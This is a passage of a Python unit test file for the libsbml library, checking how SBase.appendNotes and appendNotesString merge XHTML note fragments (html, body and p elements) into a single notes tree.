_dummyList = [ head_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ head_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ head_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node1 ]; _dummyList[:] = []; del _dummyList
pass
def test_SBase_appendNotes3(self):
att = libsbml.XMLAttributes()
ns = libsbml.XMLNamespaces()
ns.add( "http://www.w3.org/1999/xhtml", "")
html_triple = libsbml.XMLTriple("html", "", "")
head_triple = libsbml.XMLTriple("head", "", "")
title_triple = libsbml.XMLTriple("title", "", "")
body_triple = libsbml.XMLTriple("body", "", "")
p_triple = libsbml.XMLTriple("p", "", "")
html_token = libsbml.XMLToken(html_triple,att,ns)
head_token = libsbml.XMLToken(head_triple,att)
title_token = libsbml.XMLToken(title_triple,att)
body_token = libsbml.XMLToken(body_triple,att)
p_token = libsbml.XMLToken(p_triple,att)
text_token = libsbml.XMLToken("This is my text")
html_node = libsbml.XMLNode(html_token)
head_node = libsbml.XMLNode(head_token)
title_node = libsbml.XMLNode(title_token)
body_node = libsbml.XMLNode(body_token)
p_node = libsbml.XMLNode(p_token)
text_node = libsbml.XMLNode(text_token)
p_token1 = libsbml.XMLToken(p_triple,att,ns)
text_token1 = libsbml.XMLToken("This is more text")
p_node1 = libsbml.XMLNode(p_token1)
text_node1 = libsbml.XMLNode(text_token1)
p_node.addChild(text_node)
body_node.addChild(p_node)
head_node.addChild(title_node)
html_node.addChild(head_node)
html_node.addChild(body_node)
p_node1.addChild(text_node1)
self.S.setNotes(html_node)
self.S.appendNotes(p_node1)
notes = self.S.getNotes()
self.assert_(( "notes" == notes.getName() ))
self.assert_( notes.getNumChildren() == 1 )
child = notes.getChild(0)
self.assert_(( "html" == child.getName() ))
self.assert_( child.getNumChildren() == 2 )
child = child.getChild(1)
self.assert_(( "body" == child.getName() ))
self.assert_( child.getNumChildren() == 2 )
child1 = child.getChild(0)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is my text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
child1 = child.getChild(1)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is more text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
_dummyList = [ att ]; _dummyList[:] = []; del _dummyList
_dummyList = [ ns ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ head_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ head_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ head_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node1 ]; _dummyList[:] = []; del _dummyList
pass
def test_SBase_appendNotes4(self):
att = libsbml.XMLAttributes()
ns = libsbml.XMLNamespaces()
ns.add( "http://www.w3.org/1999/xhtml", "")
html_triple = libsbml.XMLTriple("html", "", "")
head_triple = libsbml.XMLTriple("head", "", "")
title_triple = libsbml.XMLTriple("title", "", "")
body_triple = libsbml.XMLTriple("body", "", "")
p_triple = libsbml.XMLTriple("p", "", "")
html_token = libsbml.XMLToken(html_triple,att,ns)
head_token = libsbml.XMLToken(head_triple,att)
title_token = libsbml.XMLToken(title_triple,att)
body_token = libsbml.XMLToken(body_triple,att)
p_token = libsbml.XMLToken(p_triple,att)
body_token1 = libsbml.XMLToken(body_triple,att,ns)
text_token = libsbml.XMLToken("This is my text")
body_node = libsbml.XMLNode(body_token1)
p_node = libsbml.XMLNode(p_token)
text_node = libsbml.XMLNode(text_token)
text_token1 = libsbml.XMLToken("This is more text")
html_node1 = libsbml.XMLNode(html_token)
head_node1 = libsbml.XMLNode(head_token)
title_node1 = libsbml.XMLNode(title_token)
body_node1 = libsbml.XMLNode(body_token)
p_node1 = libsbml.XMLNode(p_token)
text_node1 = libsbml.XMLNode(text_token1)
p_node.addChild(text_node)
body_node.addChild(p_node)
p_node1.addChild(text_node1)
body_node1.addChild(p_node1)
head_node1.addChild(title_node1)
html_node1.addChild(head_node1)
html_node1.addChild(body_node1)
self.S.setNotes(body_node)
self.S.appendNotes(html_node1)
notes = self.S.getNotes()
self.assert_(( "notes" == notes.getName() ))
self.assert_( notes.getNumChildren() == 1 )
child = notes.getChild(0)
self.assert_(( "html" == child.getName() ))
self.assert_( child.getNumChildren() == 2 )
child = child.getChild(1)
self.assert_(( "body" == child.getName() ))
self.assert_( child.getNumChildren() == 2 )
child1 = child.getChild(0)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is my text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
child1 = child.getChild(1)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is more text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
_dummyList = [ att ]; _dummyList[:] = []; del _dummyList
_dummyList = [ ns ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ head_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ head_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node1 ]; _dummyList[:] = []; del _dummyList
pass
def test_SBase_appendNotes5(self):
att = libsbml.XMLAttributes()
ns = libsbml.XMLNamespaces()
ns.add( "http://www.w3.org/1999/xhtml", "")
html_triple = libsbml.XMLTriple("html", "", "")
head_triple = libsbml.XMLTriple("head", "", "")
title_triple = libsbml.XMLTriple("title", "", "")
body_triple = libsbml.XMLTriple("body", "", "")
p_triple = libsbml.XMLTriple("p", "", "")
html_token = libsbml.XMLToken(html_triple,att,ns)
head_token = libsbml.XMLToken(head_triple,att)
title_token = libsbml.XMLToken(title_triple,att)
body_token = libsbml.XMLToken(body_triple,att)
p_token = libsbml.XMLToken(p_triple,att)
p_token1 = libsbml.XMLToken(p_triple,att,ns)
text_token = libsbml.XMLToken("This is my text")
p_node = libsbml.XMLNode(p_token1)
text_node = libsbml.XMLNode(text_token)
text_token1 = libsbml.XMLToken("This is more text")
html_node1 = libsbml.XMLNode(html_token)
head_node1 = libsbml.XMLNode(head_token)
title_node1 = libsbml.XMLNode(title_token)
body_node1 = libsbml.XMLNode(body_token)
p_node1 = libsbml.XMLNode(p_token)
text_node1 = libsbml.XMLNode(text_token1)
p_node.addChild(text_node)
p_node1.addChild(text_node1)
body_node1.addChild(p_node1)
head_node1.addChild(title_node1)
html_node1.addChild(head_node1)
html_node1.addChild(body_node1)
self.S.setNotes(p_node)
self.S.appendNotes(html_node1)
notes = self.S.getNotes()
self.assert_(( "notes" == notes.getName() ))
self.assert_( notes.getNumChildren() == 1 )
child = notes.getChild(0)
self.assert_(( "html" == child.getName() ))
self.assert_( child.getNumChildren() == 2 )
child = child.getChild(1)
self.assert_(( "body" == child.getName() ))
self.assert_( child.getNumChildren() == 2 )
child1 = child.getChild(0)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is my text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
child1 = child.getChild(1)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is more text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
_dummyList = [ att ]; _dummyList[:] = []; del _dummyList
_dummyList = [ ns ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ head_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ head_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node1 ]; _dummyList[:] = []; del _dummyList
pass
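# appendNotes6: both the existing notes and the appended content are <body>
# elements; they merge into a single <body> holding both paragraphs.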
def test_SBase_appendNotes6(self):
att = libsbml.XMLAttributes()
ns = libsbml.XMLNamespaces()
ns.add( "http://www.w3.org/1999/xhtml", "")
body_triple = libsbml.XMLTriple("body", "", "")
p_triple = libsbml.XMLTriple("p", "", "")
body_token = libsbml.XMLToken(body_triple,att,ns)
p_token = libsbml.XMLToken(p_triple,att)
text_token = libsbml.XMLToken("This is my text")
body_node = libsbml.XMLNode(body_token)
p_node = libsbml.XMLNode(p_token)
text_node = libsbml.XMLNode(text_token)
text_token1 = libsbml.XMLToken("This is more text")
body_node1 = libsbml.XMLNode(body_token)
p_node1 = libsbml.XMLNode(p_token)
text_node1 = libsbml.XMLNode(text_token1)
p_node.addChild(text_node)
body_node.addChild(p_node)
p_node1.addChild(text_node1)
body_node1.addChild(p_node1)
self.S.setNotes(body_node)
self.S.appendNotes(body_node1)
notes = self.S.getNotes()
self.assert_(( "notes" == notes.getName() ))
self.assert_( notes.getNumChildren() == 1 )
child = notes.getChild(0)
self.assert_(( "body" == child.getName() ))
self.assert_( child.getNumChildren() == 2 )
child1 = child.getChild(0)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is my text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
child1 = child.getChild(1)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is more text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
_dummyList = [ att ]; _dummyList[:] = []; del _dummyList
_dummyList = [ ns ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node1 ]; _dummyList[:] = []; del _dummyList
pass
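# appendNotes7: existing notes are a bare <p>, the appended content is a
# <body>; the result is one <body> containing both paragraphs.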
def test_SBase_appendNotes7(self):
att = libsbml.XMLAttributes()
ns = libsbml.XMLNamespaces()
ns.add( "http://www.w3.org/1999/xhtml", "")
body_triple = libsbml.XMLTriple("body", "", "")
p_triple = libsbml.XMLTriple("p", "", "")
body_token = libsbml.XMLToken(body_triple,att,ns)
p_token1 = libsbml.XMLToken(p_triple,att,ns)
text_token = libsbml.XMLToken("This is my text")
p_token = libsbml.XMLToken(p_triple,att)
p_node = libsbml.XMLNode(p_token1)
text_node = libsbml.XMLNode(text_token)
text_token1 = libsbml.XMLToken("This is more text")
body_node1 = libsbml.XMLNode(body_token)
p_node1 = libsbml.XMLNode(p_token)
text_node1 = libsbml.XMLNode(text_token1)
p_node.addChild(text_node)
p_node1.addChild(text_node1)
body_node1.addChild(p_node1)
self.S.setNotes(p_node)
self.S.appendNotes(body_node1)
notes = self.S.getNotes()
self.assert_(( "notes" == notes.getName() ))
self.assert_( notes.getNumChildren() == 1 )
child = notes.getChild(0)
self.assert_(( "body" == child.getName() ))
self.assert_( child.getNumChildren() == 2 )
child1 = child.getChild(0)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is my text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
child1 = child.getChild(1)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is more text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
_dummyList = [ att ]; _dummyList[:] = []; del _dummyList
_dummyList = [ ns ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node1 ]; _dummyList[:] = []; del _dummyList
pass
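# appendNotes8: existing notes are a <body>, the appended content is a bare
# <p>; the new paragraph is added as a sibling under the existing <body>.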
def test_SBase_appendNotes8(self):
att = libsbml.XMLAttributes()
ns = libsbml.XMLNamespaces()
ns.add( "http://www.w3.org/1999/xhtml", "")
body_triple = libsbml.XMLTriple("body", "", "")
p_triple = libsbml.XMLTriple("p", "", "")
body_token = libsbml.XMLToken(body_triple,att,ns)
p_token = libsbml.XMLToken(p_triple,att)
text_token = libsbml.XMLToken("This is my text")
body_node = libsbml.XMLNode(body_token)
p_node = libsbml.XMLNode(p_token)
text_node = libsbml.XMLNode(text_token)
p_token1 = libsbml.XMLToken(p_triple,att,ns)
text_token1 = libsbml.XMLToken("This is more text")
p_node1 = libsbml.XMLNode(p_token1)
text_node1 = libsbml.XMLNode(text_token1)
p_node.addChild(text_node)
body_node.addChild(p_node)
p_node1.addChild(text_node1)
self.S.setNotes(body_node)
self.S.appendNotes(p_node1)
notes = self.S.getNotes()
self.assert_(( "notes" == notes.getName() ))
self.assert_( notes.getNumChildren() == 1 )
child = notes.getChild(0)
self.assert_(( "body" == child.getName() ))
self.assert_( child.getNumChildren() == 2 )
child1 = child.getChild(0)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is my text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
child1 = child.getChild(1)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is more text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
_dummyList = [ att ]; _dummyList[:] = []; del _dummyList
_dummyList = [ ns ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node1 ]; _dummyList[:] = []; del _dummyList
pass
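# The appendNotesString tests below exercise the string-based overloads:
# appendNotes() should accept raw XHTML fragments as well as <notes>-wrapped
# strings and produce the same merged result either way.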
def test_SBase_appendNotesString(self):
notes = "<p xmlns=\"http://www.w3.org/1999/xhtml\">This is a test note </p>";
taggednewnotes = wrapString("<notes>\n" + " <p xmlns=\"http://www.w3.org/1999/xhtml\">This is a test note </p>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes </p>\n" +
"</notes>")
taggednewnotes2 = wrapString("<notes>\n" + " <p xmlns=\"http://www.w3.org/1999/xhtml\">This is a test note </p>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 1</p>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 2</p>\n" +
"</notes>")
newnotes = "<p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes </p>";
newnotes2 = "<p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 1</p>" + "<p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 2</p>";
newnotes3 = wrapString("<notes>\n" + " <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes </p>\n" + "</notes>")
newnotes4 = wrapString("<notes>\n" + " <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 1</p>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 2</p>\n" +
"</notes>")
self.S.setNotes(notes)
self.assert_( self.S.isSetNotes() == True )
self.S.appendNotes(newnotes)
notes1 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes1 == taggednewnotes ))
self.S.setNotes(notes)
self.S.appendNotes(newnotes2)
notes2 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes2 == taggednewnotes2 ))
self.S.setNotes(notes)
self.S.appendNotes(newnotes3)
notes3 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes3 == taggednewnotes ))
self.S.setNotes(notes)
self.S.appendNotes(newnotes4)
notes4 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes4 == taggednewnotes2 ))
pass
def test_SBase_appendNotesString1(self):
notes = wrapString("<html xmlns=\"http://www.w3.org/1999/xhtml\">\n" + " <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is a test note </p>\n" +
" </body>\n" +
"</html>")
taggednewnotes = wrapString("<notes>\n" +
" <html xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is a test note </p>\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
" </html>\n" +
"</notes>")
addnotes = wrapString("<html xmlns=\"http://www.w3.org/1999/xhtml\">\n" + " <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
"</html>")
addnotes2 = wrapString("<notes>\n" +
" <html xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
" </html>\n" +
"</notes>")
self.S.setNotes(notes)
self.S.appendNotes(addnotes)
notes1 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes1 == taggednewnotes ))
self.S.setNotes(notes)
self.S.appendNotes(addnotes2)
notes2 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes2 == taggednewnotes ))
pass
def test_SBase_appendNotesString2(self):
notes = wrapString("<html xmlns=\"http://www.w3.org/1999/xhtml\">\n" + " <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is a test note </p>\n" +
" </body>\n" +
"</html>")
taggednewnotes = wrapString("<notes>\n" +
" <html xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is a test note </p>\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
" </html>\n" +
"</notes>")
addnotes = wrapString("<body xmlns=\"http://www.w3.org/1999/xhtml\">\n" + " <p>This is more test notes </p>\n" + "</body>\n")
addnotes2 = wrapString("<notes>\n" +
" <body xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
"</notes>")
self.S.setNotes(notes)
self.S.appendNotes(addnotes)
notes1 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes1 == taggednewnotes ))
self.S.setNotes(notes)
self.S.appendNotes(addnotes2)
notes2 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes2 == taggednewnotes ))
pass
def test_SBase_appendNotesString3(self):
notes = wrapString("<html xmlns=\"http://www.w3.org/1999/xhtml\">\n" + " <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is a test note </p>\n" +
" </body>\n" +
"</html>")
taggednewnotes = wrapString("<notes>\n" +
" <html xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is a test note </p>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes </p>\n" +
" </body>\n" +
" </html>\n" +
"</notes>")
taggednewnotes2 = wrapString("<notes>\n" +
" <html xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is a test note </p>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 1</p>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 2</p>\n" +
" </body>\n" +
" </html>\n" +
"</notes>")
addnotes = "<p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes </p>\n";
addnotes2 = "<p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 1</p>\n" + "<p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 2</p>";
addnotes3 = wrapString("<notes>\n" + " <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes </p>\n" + "</notes>")
addnotes4 = wrapString("<notes>\n" + " <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 1</p>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 2</p>\n" +
"</notes>")
self.S.setNotes(notes)
self.S.appendNotes(addnotes)
notes1 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes1 == taggednewnotes ))
self.S.setNotes(notes)
self.S.appendNotes(addnotes2)
notes2 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes2 == taggednewnotes2 ))
self.S.setNotes(notes)
self.S.appendNotes(addnotes3)
notes3 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes3 == taggednewnotes ))
self.S.setNotes(notes)
self.S.appendNotes(addnotes4)
notes4 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes4 == taggednewnotes2 ))
pass
def test_SBase_appendNotesString4(self):
notes = wrapString("<body xmlns=\"http://www.w3.org/1999/xhtml\">\n" + " <p>This is a test note </p>\n" + "</body>")
taggednewnotes = wrapString("<notes>\n" +
" <html xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is a test note </p>\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
" </html>\n" +
"</notes>")
addnotes = wrapString("<html xmlns=\"http://www.w3.org/1999/xhtml\">\n" + " <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
"</html>")
addnotes2 = wrapString("<notes>\n" +
" <html xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
" </html>\n" +
"</notes>")
self.S.setNotes(notes)
self.S.appendNotes(addnotes)
notes1 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes1 == taggednewnotes ))
self.S.setNotes(notes)
self.S.appendNotes(addnotes2)
notes2 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes2 == taggednewnotes ))
pass
def test_SBase_appendNotesString5(self):
notes = "<p xmlns=\"http://www.w3.org/1999/xhtml\">This is a test note </p>";
taggednewnotes = wrapString("<notes>\n" +
" <html xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is a test note </p>\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
" </html>\n" +
"</notes>")
addnotes = wrapString("<html xmlns=\"http://www.w3.org/1999/xhtml\">\n" + " <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
"</html>")
addnotes2 = wrapString("<notes>\n" +
" <html xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
" </html>\n" +
"</notes>")
self.S.setNotes(notes)
self.S.appendNotes(addnotes)
notes1 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes1 == taggednewnotes ))
self.S.setNotes(notes)
self.S.appendNotes(addnotes2)
notes2 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes2 == taggednewnotes ))
pass
def test_SBase_appendNotesString6(self):
notes = wrapString("<body xmlns=\"http://www.w3.org/1999/xhtml\">\n" + " <p>This is a test note </p>\n" + "</body>")
taggednewnotes = wrapString("<notes>\n" +
" <body xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <p>This is a test note </p>\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
"</notes>")
addnotes = wrapString("<body xmlns=\"http://www.w3.org/1999/xhtml\">\n" + " <p>This is more test notes </p>\n" + "</body>")
addnotes2 = wrapString("<notes>\n" +
" <body xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
"</notes>")
self.S.setNotes(notes)
self.S.appendNotes(addnotes)
notes1 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes1 == taggednewnotes ))
self.S.setNotes(notes)
self.S.appendNotes(addnotes2)
notes2 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes2 == taggednewnotes ))
pass
